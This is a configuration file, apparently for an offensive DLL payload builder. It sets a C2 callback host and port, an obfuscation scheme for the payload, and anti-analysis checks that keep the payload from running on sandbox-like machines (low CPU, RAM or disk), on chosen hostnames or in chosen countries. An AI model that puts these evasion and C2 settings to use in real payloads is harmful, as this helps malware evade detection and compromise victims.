[Payload]
# DLL Payload, need to match src/dll/<type>.c
type=debug

# Remote host and port corresponding to the C2 server to connect back to, if needed
lhost="0.0.0.0"
lport=443

# xor, dictionary (not yet aes/rc4) (XOR SEEMS NO BUENO ANYMORE)
# encryption_method=xor
encryption_method=dictionary

# XOR key, if encryption_method=xor else ignored
# random -> between 0x1111 and 0xffff with good entropy
# encryption_key=random
encryption_key=0xabcd

# Dict wordlist source, if encryption_method=dictionary else ignored
# Can be file or URL
wordlist_source=data/words_100000.txt
# wordlist_source=https://www.mit.edu/~ecprice/wordlist.100000

[Anti-Analysis]
# If cpu cores is less or equal than <value>, the payload will not be executed
# If not set, check will no be made
cpu_cores=1

# If ram size is less than <value>, the payload will not be executed
# If not set, check will no be made
# Size in MB
ram_size=1024
# If disk size is less than <value>, the payload will not be executed
# If not set, check will no be made
# Size in GB
disk_size=8

# target_hostname has priority over avoid_hostname
# target_hostname=
target_hostname=
# target_hostname=prefix1

# correct format is
# avoid_hostname=prefix1
# avoid_hostname=prefix1,prefix2,prefix3
avoid_hostname=

# based on : keyboard layout, language, timezone
# if one match, the payload will not be executed
# avoid_countries=RU,CN
avoid_countries=
